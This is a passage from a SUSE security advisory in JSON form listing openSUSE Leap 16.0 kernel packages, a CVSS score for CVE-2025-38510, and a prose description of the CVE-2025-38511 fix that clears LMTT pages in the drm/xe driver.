"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38510"
},
{
"cve": "CVE-2025-38511",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38511"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/pf: Clear all LMTT pages on alloc\n\nOur LMEM buffer objects are not cleared by default on alloc\nand during VF provisioning we only setup LMTT PTEs for the\nactually provisioned LMEM range. But beyond that valid range\nwe might leave some stale data that could either point to some\nother VFs allocations or even to the PF pages.\n\nExplicitly clear all new LMTT page to avoid the risk that a\nmalicious VF would try to exploit that gap.\n\nWhile around add asserts to catch any undesired PTE overwrites\nand low-level debug traces to track LMTT PT life-cycle.\n\n(cherry picked from commit 3fae6918a3e27cce20ded2551f863fb05d4bef8d)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
